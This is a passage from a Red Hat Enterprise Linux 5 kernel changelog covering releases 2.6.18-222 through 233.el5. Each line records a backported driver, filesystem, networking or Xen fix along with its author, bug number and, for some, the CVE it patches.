setup_arg_pages: diagnose excessive argument size (Oleg Nesterov) [645227]\n- [net] bnx2x: force interrupt mode for iscsi unset mac (Michal Schmidt) [655885]\n- [scsi] bnx2i: allow to abort connect if request times out (Mike Christie) [653991]\n- [scsi] bnx2i: fix remote TCP RST handling for 570X (1g) (Mike Christie) [653991]\n- [scsi] bnx2i: fix a cid leak issue for 5771X (10g) (Mike Christie) [653991]\n- [scsi] bnx2i: fix endian bug in TMF LUN cmd send (Mike Christie) [653991]\n- [misc] prevent divide by 0 in the kernel during boot (Larry Woodman) [508140]\n- [net] filter: make sure filters dont read uninit memory (Jiri Pirko) [651703] {CVE-2010-4158}\n- [net] inet_diag: make sure we run audited bytecode (Jiri Pirko) [651267]\n- [net] limit sendto/recvfrom/iovec total length to INT_MAX (Jiri Pirko) [645872] {CVE-2010-3859}\n- [bluetooth] hci_ldisc: fix missing NULL check (Jarod Wilson) [655666]\n- [net] be2net: avoid firmware update if interface not open (Ivan Vecera) [651948]\n- [ipc] shm: fix information leak to userland (Danny Feng) [648687] {CVE-2010-4072}\n- [ipc] initialize struct memory to 0 for compat functions (Danny Feng) [648693] {CVE-2010-4073}\n- [net] netxen: dont use reset_devices, it may go away (Chad Dupuis) [643254]\n- [net] netxen: fix kdump (Chad Dupuis) [643254]\n- [net] qlcnic: avoid reset_devices, it may become obsolete (Chad Dupuis) [656008]\n- [net] qlcnic: fix for kdump (Chad Dupuis) [656008]\n- [pci] block on access to temporarily unavailable device (Chad Dupuis) [656008]\n- [serial] serial_core: clean data before filling it (Mauro Carvalho Chehab) [648701] {CVE-2010-4075}\n- [edac] i7core_edac: return -ENODEV if dev already probed (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: properly terminate pci_dev_table (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: fix PCI refcounting on reloads (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: fix refcount error at PCI devices (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: safe to unregister mci when mci NULL (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: fix an oops at i7core probe (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: remove unused member in i7core_pvt (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: remove unused arg in get_dimm_config (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: reduce args of i7core_register_mci (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: use saved pointers (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: check probe counter in i7core_remove (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: call pci_dev_put on alloc failure (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: fix error path of i7core_register_mci (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: fix line order in i7core_register_mci (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: always do get/put for all devices (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: ensure edac pci handler release (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: introduce free_i7core_dev (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: introduce alloc_i7core_dev (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: reduce args of i7core_get_onedevice (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: fix the logic in i7core_remove (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: dont do legacy PCI probe by default (Mauro Carvalho Chehab) [651869]\n- [edac] edac_core: print debug messages at release calls (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: remove PCI devices from devices list (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: MCE NMI handling should stop first (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: improve debug register/remove errors (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: move #if PAGE_SHIFT to edac_core.h (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: terminate the group of udimm counters (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: mark const static vars as such (Mauro Carvalho Chehab) [651869]\n- [edac] i7core_edac: move static vars to the top of file (Mauro Carvalho Chehab) [651869]\n- [virt] xen: add bounds req-process loop in blkback/blktap (Laszlo Ersek) [654546] {CVE-2010-4247}\n- [virt] xen: dont leak dev refs on bad xenbus transitions (Laszlo Ersek) [635999] {CVE-2010-3699}\n- [mm] fix possible integer overflow in mm/fremap.c (Larry Woodman) [637047]\n- [misc] futex: replace LOCK_PREFIX in futex.h (Jiri Pirko) [633176] {CVE-2010-3086}\n[2.6.18-233.el5]\n- [scsi] mpt2sas: use sas device list for enclosure id (Tomas Henzl) [652284]\n- [scsi] ipr: fix mailbox register definition and add delay (Steve Best) [654446]\n- [scsi] ipr: fix lun assignment and comparison (Steve Best) [654446]\n- [powerpc] add AT_BASE_PLATFORM to Aux Vector and power7 (Steve Best) [652279]\n- [infiniband] ehea: use shca_list_lock spinlock (Steve Best) [613797]\n- [powerpc] kdump: CPUs assume context of oopsing CPU (Steve Best) [509792]\n- [scsi] lpfc: Update version for 8.2.0.87 driver release (Rob Evers) [649489]\n- [scsi] lpfc: add handling SLI4 unsolicted ELS RTV (Rob Evers) [649489]\n- [scsi] lpfc: add handling ECHO response support (Rob Evers) [649489]\n- [scsi] lpfc: add handling of SLI4 unsolicted ELS (Rob Evers) [649489]\n- [scsi] lpfc: fix locking for security mailbox commands (Rob Evers) [649489]\n- [scsi] lpfc: abort I/Os and wait on XRI in SLI4 unload (Rob Evers) [649489]\n- [scsi] lpfc: handle devloss timeout in FIP engine (Rob Evers) [649489]\n- [scsi] lpfc: fix crashes on NULL pnode dereference (Rob Evers) [649489]\n- [net] cnic: Add cnic_free_uio (Mike Christie) [651287]\n- [net] cnic: Add cnic_uio_dev struct (Mike Christie) [651287]\n- [net] cnic: Add cnic_free_uio (Mike Christie) [651287]\n- [net] cnic: Fine-tune ring init code (Mike Christie) [651287]\n- [misc] fix dirty_bytes sysctl name (Larry Woodman) [635782]\n- [fs] procfs: acquire inode mutex around llseek operation (Lachlan McIlroy) [644726]\n- [virt] netfront: default to copying instead of flipping (Laszlo Ersek) [653262]\n- [virt] netback: dont balloon up for copying receivers (Laszlo Ersek) [653501]\n- [net] rds: fix rds_iovec page count overflow (Jiri Pirko) [647422]\n- [net] virtio_net: add link status handling (Jason Wang) [649573]\n- [net] be2net: Update be2net to version 2.102.512r (Ivan Vecera) [647259]\n- [char] watchdog: another LPC Controller ID for Patsburg (David Milburn) [570868]\n- [misc] another LPC Controller ID for Intel Patsburg PCH (David Milburn) [570868]\n- [i2c] i2c-i801: Add Intel Patsburg device ID (David Milburn) [570868]\n- [misc] pci: update Intel Patsburg defines (David Milburn) [570868]\n- [misc] x86/PCI irq and pci_ids for Intel Patsburg Devices (David Milburn) [570868]\n- [sound] ALSA HD Audio for Intel Patsburg DeviceIDs (David Milburn) [570868]\n- [char] watchdog: TCO Watchdog for Intel Patsburg Devices (David Milburn) [570868]\n- [ata] ahci: AHCI and RAID mode for Intel Patsburg Devices (David Milburn) [570868]\n- [ata] ata_piix: IDE Mode SATA for Intel Patsburg Devices (David Milburn) [570868]\n- [net] fix deadlock in sock_queue_rcv_skb (Danny Feng) [652537]\n- [scsi] qla2xxx: check null fcport in _queuecommands (Chad Dupuis) [644863]\n- [net] qlcnic: Fix missing error codes (Chad Dupuis) [637194]\n- [usb] wacom: add support for Cintiq 21UX2 (Aristeu Rozanski) [652731]\n- [xen] hvm: add HVMOP_get_time hypercall (Paolo Bonzini) [638082]\n[2.6.18-232.el5]\n- [scsi] mpt2sas: use correct pci_resource_flag for compare (Tomas Henzl) [649885]\n- [sound] rme9652: prevent reading uninitialized stack mem (Stanislaw Gruszka) [648709 648714] {CVE-2010-4080 CVE-2010-4081}\n- [net] packet: fix information leak to userland (Jiri Pirko) [649898]\n- [ipc] sys_semctl: fix kernel stack leakage (Danny Feng) [648722] {CVE-2010-4083}\n- [misc] kernel: remove yield from stop_machine paths (Oleg Nesterov) [634454]\n- [fs] dlm: reduce cond_resched during send (David Teigland) [604139]\n- [fs] dlm: use TCP_NODELAY (David Teigland) [604139]\n- [fs] nfs: fix a referral error Oops (Steve Dickson) [556886]\n- [fs] gfs2: fix race in unlinked inode deallocation (Robert S Peterson) [643165]\n- [scsi] retry on DID_REQUEUE errors (Mike Christie) [627836]\n- [net] sctp: do not reset packet during sctp_packet_config (Jiri Pirko) [637867]\n- [net] bnx2: add AER support (John Feeney) [617024]\n- [net] bonding: no lock on copy/clear VLAN list on slave (Andy Gospodarek) [627974]\n- [scsi] gdth: prevent integer overflow in ioc_general (Frantisek Hrbata) [651176]\n[2.6.18-231.el5]\n- [scsi] scsi_dh_alua: remove IBM Power Virtual SCSI ALUA (Steve Best) [567292]\n- [fs] gfs2: flock (LOCK_EX|LOCK_NB) blocks (Robert S Peterson) [648602]\n- [scsi] lpfc: update version for 8.2.0.86 driver release (Rob Evers) [645881]\n- [scsi] lpfc: fix race sending FDISC to un-init VPI (Rob Evers) [645881]\n- [scsi] lpfc: fix mailbox handling for UNREG_RPI_ALL case (Rob Evers) [645881]\n- [kernel] add stop_machine barrier to fix lock contention (Prarit Bhargava) [634454]\n- [scsi] bnx2i: fix ip address formatting and oops (Mike Christie) [646708]\n- [scsi] be2iscsi: remove premature free of cid (Mike Christie) [640029]\n- [fs] proc: make proc pid limits world readable (Jiri Olsa) [611535]\n- [ide] atiixp: fix locking hang in ide layer ATIIXP driver (James Leddy) [586482]\n- [security] only check mmap_min_addr perms for write (Eric Paris) [623519]\n- [ata] sata_sil24: add DID for another adaptec flavor (David Milburn) [640586]\n- [s390] cio: prevent panic in I/O cancel function (Hendrik Brueckner) [647807]\n- [s390] cio: prevent panic after unexpected I/O interrupt (Hendrik Brueckner) [647502]\n[2.6.18-230.el5]\n- [fs] nfs: fix regression in NFS Direct I/O path (Steve Dickson) [647297]\n- [fs] nfs: allow different protocol mounts to same server (Steve Dickson) [460659]\n- [scsi] lpfc: update version for 8.2.0.85 driver release (Rob Evers) [639028]\n- [scsi] lpfc: fix a BUG_ON in lpfc_abort_handler (Rob Evers) [639028]\n- [scsi] lpfc: use pci reset function on driver unload (Rob Evers) [639028]\n- [scsi] lpfc: replace some spin_lock_irqs w/spin_locks (Rob Evers) [639028]\n- [scsi] lpfc: fail io w/lost frame and target check cond (Rob Evers) [639028]\n- [scsi] lpfc: fix abort WQEs for FIP frames (Rob Evers) [639028]\n- [scsi] lpfc: update version for 8.2.0.84 driver release (Rob Evers) [639028]\n- [scsi] lpfc: unreg all rpi mbox command before unreg vpi (Rob Evers) [639028]\n- [scsi] lpfc: make all error values negative (Rob Evers) [639028]\n- [scsi] lpfc: remove duplicate code from lpfc_els_retry (Rob Evers) [639028]\n- [scsi] lpfc: fix circular spinlock dep w/scsi midlayer (Rob Evers) [639028]\n- [scsi] lpfc: update version for 8.2.0.83 driver release (Rob Evers) [639028]\n- [scsi] lpfc: fix FLOGI issue with McData4700 FC switch (Rob Evers) [639028]\n- [scsi] lpfc: fix possible roundrobin failover failure (Rob Evers) [639028]\n- [scsi] lpfc: fix unregister of unused FCF on timeout (Rob Evers) [639028]\n- [scsi] lpfc: fix heartbeat timeout during pause test (Rob Evers) [639028]\n- [scsi] lpfc: update version for 8.2.0.82 driver release (Rob Evers) [639028]\n- [scsi] lpfc: fix lpfc_els_retry delay/retry for PLOGI (Rob Evers) [639028]\n- [scsi] lpfc: streamline some spin locks (Rob Evers) [639028]\n- [scsi] lpfc: fix lpfc_initial_flogi return on failure (Rob Evers) [639028]\n- [scsi] lpfc: fix stray state update issue with new FCF (Rob Evers) [639028]\n- [scsi] lpfc: treat FCF prop with different index as error (Rob Evers) [639028]\n- [scsi] lpfc: fix misc auth issues on EmulexSecure FC HBA (Rob Evers) [639028]\n- [scsi] lpfc: update version for 8.2.0.81 driver release (Rob Evers) [639028]\n- [scsi] lpfc: move unload flag earlier in vport delete (Rob Evers) [639028]\n- [scsi] lpfc: fix IOCB leak on FDISC completion (Rob Evers) [639028]\n- [scsi] lpfc: fix possible crash on non-SLI4 hba (Rob Evers) [639028]\n- [scsi] mpt2sas: fix panic w/direct attached SEP (Jarod Wilson) [641086]\n- [redhat] spec: clean up rpmbuild kabideps detritus (Jarod Wilson) [644129]\n- [net] bnx2: Increase max rx ring size from 1K to 2K (Andy Gospodarek) [640026]\n- [net] bnx2: fixup broken NAPI accounting (Andy Gospodarek) [640026]\n- [s390] qeth: portno 1 support for OSM-device insufficient (Hendrik Brueckner) [644008]\n[2.6.18-229.el5]\n- [pci] include DL580 G7 in bfsort whitelist (Tony Camuso) [644879]\n- [net] igb: fix TX hang when loading igb with max_vfs > 7 (Stefan Assmann) [645284]\n- [virt] fix timekeeping_use_tsc check in init_tsc_timer (Prarit Bhargava) [643926]\n- [net] bonding: support netconsole over bonded link (Neil Horman) [235343]\n- [virt] xen: increase txqueuelen of netback vif devices (Miroslav Rezanina) [539626]\n- [sound] core: prevent heap corruption in snd_ctl_new (Jerome Marchand) [638484] {CVE-2010-3442}\n- [net] updated drivers need version string updates too (Andy Gospodarek) [635027]\n- [misc] softlockup: increase timeout to 60 seconds (Don Zickus) [643707]\n- [virt] xen: fix vdso failure under xen pv environment (Danny Feng) [644860]\n- [scsi] qla2xxx: fix zero test on array in ql_fc_loopback (Chad Dupuis) [644136]\n- [usb] net/catc: change NICs TX_MAX_BURST, fixes probe (Bob Picco) [637826]\n- [virt] console: dont block guest if host doesnt read (Amit Shah) [644735]\n- [media] video: remove compat code for VIDIOCSMICROCODE (Mauro Carvalho Chehab) [642471] {CVE-2010-2963}\n- [xen] vtd: let IOMMU use another IRQ without conflict (Don Dugger) [575790]\n- [net] bonding: correctly process non-linear skbs (Andy Gospodarek) [619070]\n- [net] rds: fix local privilege escalation (Eugene Teo) [642898] {CVE-2010-3904}\n[2.6.18-228.el5]\n- [char] tpm: pay attention to IRQ info from PNP in tpm_tis (Stefan Assmann) [636760]\n- [misc] cpufreq: add missing cpufreq_cpu_put (Prarit Bhargava) [643080]\n- [md] fix softlockup issue waiting for resync to finish (James Paradis) [573106]\n- [s390] dasd_eckd: remove PSF order/suborder ioctl check (John Feeney) [565973]\n- [fs] xfs: fix speculative allocation beyond eof (Dave Chinner) [638753]\n[2.6.18-227.el5]\n- [net] ixgbe: add option to control interrupt mode (Andy Gospodarek) [571495]\n- [md] raid0: fix data corruption on 32-bit w/large storage (Stanislaw Gruszka) [573185]\n- [scsi] fix write buffer length in scsi_req_map_sg (Steve Best) [637235]\n- [scsi] ipr: back out isr optimization changes (Steve Best) [634213]\n- [scsi] ipr: fix rsrc addr format and add attr for dev ID (Steve Best) [634213]\n- [fs] jbd2: properly align sized slab caches (Eric Sandeen) [638961]\n- [fs] ext4: dont scan/accumulate too many pages (Eric Sandeen) [572930]\n- [fs] gfs2: fix fatal filesystem consistency error (Robert S Peterson) [529914]\n- [scsi] lpfc: update version for 8.2.0.80 driver release (Rob Evers) [619917]\n- [scsi] lpfc: add Security Crypto support to CONFIG_PORT (Rob Evers) [619917]\n- [scsi] lpfc: remove unused variables (Rob Evers) [619917]\n- [scsi] lpfc: log msg 0318 is a warning, not an error (Rob Evers) [619917]\n- [scsi] lpfc: fix bug w/cable swap and non-empty nodelist (Rob Evers) [619917]\n- [scsi] lpfc: fix a failure to roundrobin on all FCFs (Rob Evers) [619917]\n- [scsi] lpfc: fix heartbeat timeout during fabric reconfig (Rob Evers) [619917]\n- [scsi] lpfc: update version for 8.2.0.79 driver release (Rob Evers) [619917]\n- [scsi] lpfc: fix a Clear Virtual Link recovery failure (Rob Evers) [619917]\n- [scsi] lpfc: clear VFI_REGISTERED flag after UNREG_VFI (Rob Evers) [619917]\n- [scsi] lpfc: ignore failure of REG_VPI mbox w/UPD bit set (Rob Evers) [619917]\n- [scsi] lpfc: fix ioctl using inactive ndlp for ct resp (Rob Evers) [619917]\n- [scsi] lpfc: fix bug w/ndlp not activated post-cable swap (Rob Evers) [619917]\n- [scsi] lpfc: add support UPD bit of REG_VPI mailbox cmd (Rob Evers) [619917]\n- [scsi] lpfc: fix driver discovery issue after link bounce (Rob Evers) [619917]\n- [scsi] lpfc: fix VLAN ID 0xFFF set to reg_fcfi mbox cmd (Rob Evers) [619917]\n- [scsi] lpfc: update version for 8.2.0.78 driver release (Rob Evers) [619917]\n- [scsi] lpfc: fix race condition causing >1 FLOGI commands (Rob Evers) [619917]\n- [scsi] lpfc: enhance round-robin FCF failover algorithm (Rob Evers) [619917]\n- [scsi] lpfc: clear Ignore Reg Login when purging mailbox (Rob Evers) [619917]\n- [scsi] lpfc: fix for ELS commands stuck on txq (Rob Evers) [619917]\n- [scsi] lpfc: added target queuedepth module parameter (Rob Evers) [619917]\n- [scsi] lpfc: fix RoundRobin FCF failover issue (Rob Evers) [619917]\n- [scsi] re-enable transistions from OFFLINE to RUNNING (Mike Christie) [641193]\n- [edac] i7300_edac: properly init per-csrow memory size (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: better initialize page counts (Mauro Carvalho Chehab) [487428]\n- [redhat] configs: enable edac debugging debug kernels (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: backport driver to RHEL5.6 codebase (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: add appropriate MAINTAINERS info (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: coding style cleanups (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: improve inline comments/documentation (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: reorganize file contents (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: properly detect channel on CE errors (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: enrich FBD info for corrected errors (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: enrich FBD error info for fatal errors (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: pre-allocate buffer for error messages (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: fix MTR x4/x8 detection logic (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: make debug messages consistent (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: remove stale get_error_info logic (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: add error registers cleanup support (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: add support for reporting FBD errors (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: properly detect error correction type (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: detect if device is in single mode (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: add detection of enhanced scrub mode (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: clear error bit after reading (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: add error detection for global errors (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: better PCI device names (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: Add FIXME about error correction type (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: add global error registers (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: display info if ECC is enabled or not (Mauro Carvalho Chehab) [487428]\n- [edac] i7300_edac: new driver for Intel i7300 chipset (Mauro Carvalho Chehab) [487428]\n- [mm] kswapd: dont get stuck in D state w/fragmented mem (Larry Woodman) [609668]\n- [misc] x86_64: fix hang at Booting processor 1/8 APIC (John Villalovos) [639851]\n- [misc] oprofile: add backtraces for compat mode processes (Jiri Olsa) [622024]\n- [net] tg3: re-enable 5717 B0 support (John Feeney) [634320]\n- [net] tg3: fix 5717/57765/5719 memory leak (John Feeney) [631963]\n- [net] tg3: display FW version, handle FW events correctly (John Feeney) [634325]\n- [net] bnx2: improve tx fast path performance (John Feeney) [632057]\n- [net] enic: update to upstream version 1.4.1.2 (Andy Gospodarek) [568111]\n- [net] ixgbe: fix 82598 link issue and panic w/shared irq (Andy Gospodarek) [637331]\n- [net] mlx4: bump max log_mtts_per_seg memory reservation (Jay Fenlason) [636198]\n- [usb] net: add support for CDC EEM (Don Zickus) [572519]\n- [scsi] qla2xxx: clear post-uncorrectable non-fatal errors (Chad Dupuis) [572258]\n- [net] qlcnic: fix poll implementation (Chad Dupuis) [625084]\n- [net] qlcnic: TSO feature added for vlan devices (Chad Dupuis) [625084]\n- [net] qlcnic: fix diag resource allocation (Chad Dupuis) [625084]\n- [net] qlcnic: fix loopback test (Chad Dupuis) [625084]\n- [net] qlcnic: fix bandwidth check (Chad Dupuis) [625084]\n- [net] qlcnic: fix gro support (Chad Dupuis) [625084]\n- [s390] kernel: fix fork vs /proc/stat race (Hendrik Brueckner) [627298]\n- [misc] amd_iommu: fix kdump OOM issue seen with iommu=pt (Bhavna Sarathy) [627663]\n- [fs] execve: fix interactivity and response to SIGKILL (Dave Anderson) [629176]\n- [virt] virtio_console: fix userspace NULL buffer submits (Amit Shah) [636046]\n- [virt] virtio_console: fix poll blocking when data ready (Amit Shah) [636020]\n- [virt] virtio_console: send SIGIO as needed for host evts (Amit Shah) [636053]\n- [virt] virtio_console: make hot-unplug safe (Amit Shah) [628828]\n- [net] virtio_net: defer skb allocation in receive path (Anthony Liguori) [565560]\n- [misc] increase logbuf size to 512K (Don Zickus) [563535]\n- [xen] hvm: correct accuracy of pmtimer (Andrew Jones) [633028]\n- [xen] fix guest crash on non-EPT machine may crash host (Paolo Bonzini) [621430] {CVE-2010-2938}\n[2.6.18-226.el5]\n- [net] bonding: fix IGMP report on slave during failover (Flavio Leitner) [637764]\n[2.6.18-225.el5]\n- [usb] serial/pl2303: add id for HP LD220-HP POS display (Don Zickus) [580698]\n[2.6.18-224.el5]\n- [scsi] mpt2sas: recover from injected PCIe bus errors (Tomas Henzl) [568281]\n- [message] fusion: remove unnecessary printk flooding logs (Tomas Henzl) [629081]\n- [scsi] scsi_dh_alua: handle transitioning state correctly (Mike Snitzer) [619361]\n- [scsi] lpfc: fix ioctl crash in lpfc_nlp_put (Rob Evers) [625841]\n- [net] trace: fix sk_buff typo in network tracepoints (Neil Horman) [568614]\n- [net] sched: fix info leak in traffic policing (Neil Horman) [636392]\n- [md] dm: fix deadlock with fsync vs. resize in lvm (Mikulas Patocka) [624068]\n- [misc] amd_iommu: fix slab corruption with iommu enabled (Larry Woodman) [530619]\n- [mm] add dirty_background_bytes and dirty_bytes sysctls (Larry Woodman) [635782]\n- [scsi] add scsi_dispatch_* tracepoints (Jiri Olsa) [568290]\n- [misc] oprofile: support Intel CPU Family 6, Model 22, 29 (Jiri Olsa) [493047]\n- [fs] aio: fix flush_workqueue deadlock (Jeff Moyer) [546700]\n- [net] be2net: use generated MAC addr for VFs, fix BUG_ON (Ivan Vecera) [630680]\n- [fs] sysfs: add labeling support for sysfs (Eric Paris) [582374]\n- [selinux] inode_*secctx hooks to access security ctx info (Eric Paris) [582374]\n- [fs] xattr: refactor vfs_setxattr for SELinux hook use (Eric Paris) [582374]\n- [redhat] configs: compile TCG modules for kernel-xen (Andrew Jones) [636100]\n- [net] netxen: fix poll implementation (Chad Dupuis) [625079]\n- [net] netxen: fix a race in netxen_nic_get_stats() (Chad Dupuis) [625079]\n- [net] netxen: update version 4.0.74 (Chad Dupuis) [625079]\n- [net] netxen: fix feature setting for vlan devices (Chad Dupuis) [625079]\n- [net] netxen: fix tx csum setting (Chad Dupuis) [625079]\n- [scsi] qla2xxx: recover on mmio_enable function for 82XX (Chad Dupuis) [613134]\n- [scsi] qla2xxx: add AER support for 82XX (Chad Dupuis) [613134]\n- [misc] amd_iommu: change default to passthrough mode (Bhavna Sarathy) [628018]\n- [misc] amd_iommu: add passthrough mode support (Bhavna Sarathy) [561127]\n- [misc] amd: dont use mwait_idle on AMD CPUs (Bhavna Sarathy) [610199]\n- [misc] amd: show L3 cache info for all CPU families (Bhavna Sarathy) [610199]\n- [misc] amd: unify L3 cache index disable checking (Bhavna Sarathy) [610199]\n- [misc] amd: avoid dupe sysfs bits for thresholding banks (Bhavna Sarathy) [610199]\n- [misc] amd: remove superfluous CPU family/model check (Bhavna Sarathy) [610199]\n- [misc] fix race in pid generation causing immediate reuse (Dave Anderson) [634850]\n[2.6.18-223.el5]\n- [redhat] kabi: add net symbols for RHEL5.6 (Jon Masters) [547689 555708 558999 568558 569606 613193]\n- [redhat] kabi: add Block and SCSI symbols for RHEL5.6 (Jon Masters) [547689 558999 566767 569606 574557]\n- [redhat] kabi: add PCI kernel symbols for RHEL5.6 (Jon Masters) [547689 555708 566767 568558 569606 597143 613193]\n- [redhat] kabi: add core kernel symbols for RHEL5.6 (Jon Masters) [545218 562242]\n- [net] ipvs: add one-packet scheduler (Thomas Graf) [578836]\n- [pci] fix pci_mmcfg_init making some memory uncacheable (Shyam Iyer) [581933]\n- [virt] xen: fix crashing of x86 hvm guest on x86_64 (Radim Krcmar) [605697]\n- [scsi] fix disk spinup for shorter path restore times (Rob Evers) [608109]\n- [scsi] aacraid: fix file system falsely going read-only (Rob Evers) [523920]\n- [misc] x86: fix cpuid_level on Intel pre-model 13 cpus (Prarit Bhargava) [606851]\n- [net] cxgb3: alt buffer freeing strategy when xen dom0 (Paolo Bonzini) [488882]\n- [net] bonding: enable output slave selection (Neil Horman) [516289]\n- [md] dm-raid1: fix data lost at mirror log failure (Mikulas Patocka) [555197]\n- [md] kcopyd: dm snapshot performance improvement (Mikulas Patocka) [466088]\n- [scsi] increase sync cache timeout (Mike Christie) [592322]\n- [scsi] log msg when getting Unit Attention (Mike Christie) [585431]\n- [virt] xen: add dummy mwait for xen to make it compile (Luming Yu) [573514]\n- [x86_64] use apic as main timer if non-stop-apic timer (Luming Yu) [573514]\n- [acpi] cpu: use MWAIT for C-state (Luming Yu) [573514]\n- [net] ipv4/defrag: check socket type before reference (Jiri Olsa) [632266]\n- [net] ipv4: prevent chained skb destined to UFO device (Jiri Olsa) [633450]\n- [block] cfq: no merges for queues w/no process references (Jeff Moyer) [605265]\n- [fs] aio: check for multiplication overflow in io_submit (Jeff Moyer) [629449] {CVE-2010-3067}\n- [misc] make compat_alloc_user_space incorporate access_ok (Don Howard) [634464] {CVE-2010-3081}\n- [fs] xfs: prevent reading uninitialized stack memory (Dave Chinner) [630807] {CVE-2010-3078}\n- [fs] aio: fix cleanup in io_submit_one (Jeff Moyer) [631721] {CVE-2010-3066}\n[2.6.18-222.el5]\n- [cpufreq] powernow-k8: fix per core frequency control (Bhavna Sarathy) [502397]\n- [misc] uid/gid: fix integer overflow in groups_search (Jerome Marchand) [629626]\n- [virt] xen: remove dead code (Paolo Bonzini) [507846]\n- [virt] xen: dont give up ballooning under mem pressure (Paolo Bonzini) [507846]\n- [net] ipv4: fix oops in writing to forwarding sysctl (Neil Horman) [629638]\n- [net] trace: backport some networking tracepoints (Neil Horman) [568614]\n- [misc] rename topology_*_cpumask back to *_siblings (Michal Schmidt) [633388]\n- [scsi] 3w_sas: add new 3ware SAS driver (Tomas Henzl) [572011]\n- [scsi] 3w-9xxx: update to 2.26.08.007-2.6.18RH (Tomas Henzl) [572004]\n- [scsi] megaraid: fix suspend function (Tomas Henzl) [630927]\n- [net] ipv6: add modes to do RA/RS when in forwarding mode (Thomas Graf) [614064]\n- [fs] nfsv4: fix bug when server returns NFS4ERR_RESOURCE (Steve Dickson) [620502]\n- [fs] nfsv4: ensure lockowners are labelled correctly (Steve Dickson) [620502]\n- [fs] nfsv4: add support for RELEASE_LOCKOWNER operation (Steve Dickson) [620502]\n- [fs] nfsv4: clean up for lockowner XDR encoding (Steve Dickson) [620502]\n- [fs] nfsv4: ensure we track lock state in r/w requests (Steve Dickson) [620502]\n- [scsi] qla4xxx: add PCIe AER support (Chad Dupuis) [624710]\n- [scsi] qla4xxx: update version to 5.02.03.00.05.06-d1 (Chad Dupuis) [623675]\n- [scsi] qla4xxx: resolve name space error with qla2xxx (Chad Dupuis) [623675]\n- [net] qlcnic: add AER support and miscellaneous fixes (Chad Dupuis) [614281]\n- [net] qlcnic: add NIC partitioning and other misc fixes (Chad Dupuis) [614281]\n- [net] qlcnic: misc upstream fixes for RHEL5.6 (Chad Dupuis) [614281]\n- [net] ipv4: fix buffer overflow in icmpmsg_put (Frantisek Hrbata) [601391]\n- [proc] allow access to /proc//fd after setuid (Danny Feng) [617707]\n- [fs] xfs: fix missing untrusted inode lookup tag (Dave Chinner) [607032]\n- [wireless] fixes from 2.6.32.18 (Stanislaw Gruszka) [621105]\n- [wireless] fixes from 2.6.32.17 (Stanislaw Gruszka) [621105]\n- [wireless] fixes from 2.6.32.16 (Stanislaw Gruszka) [621105]\n- [wireless] fixes from 2.6.32.14 (Stanislaw Gruszka) [621105]\n- [wireless] fixes from 2.6.32.13 (Stanislaw Gruszka) [621105]\n- [wireless] fixes from 2.6.32.12 (Stanislaw Gruszka) [621105]\n- [wireless] fixes from 2.6.32.11 (Stanislaw Gruszka) [621105]\n- [wireless] fixes from 2.6.32.10 (Stanislaw Gruszka) [621105]\n- [wireless] fixes from 2.6.32.9 (Stanislaw Gruszka) [621105]\n- [wireless] fixes from 2.6.32.8 (Stanislaw Gruszka) [621105]\n- [xen] emulate task switching (Paolo Bonzini) [625903]\n- [xen] introduce hvm_set_cr3 (Paolo Bonzini) [625903]\n- [xen] introduce hvm_virtual_to_linear_addr (Paolo Bonzini) [625903]\n- [xen] introduce hvm_set_segment_register (Paolo Bonzini) [625903]\n- [xen] hvm: big cleanups and fixes to event deliver logic (Paolo Bonzini) [625903]\n- [xen] vmx: simplify event-injection logic (Paolo Bonzini) [625903]\n- [xen] xm trigger NMI support for HVM guests (Paolo Bonzini) [625902]\n- [xen] virtual NMI support (Paolo Bonzini) [625902]\n- [xen] emulate injection of guest NMI (Paolo Bonzini) [625902]\n- [xen] introduce get_isa_irq_vector and 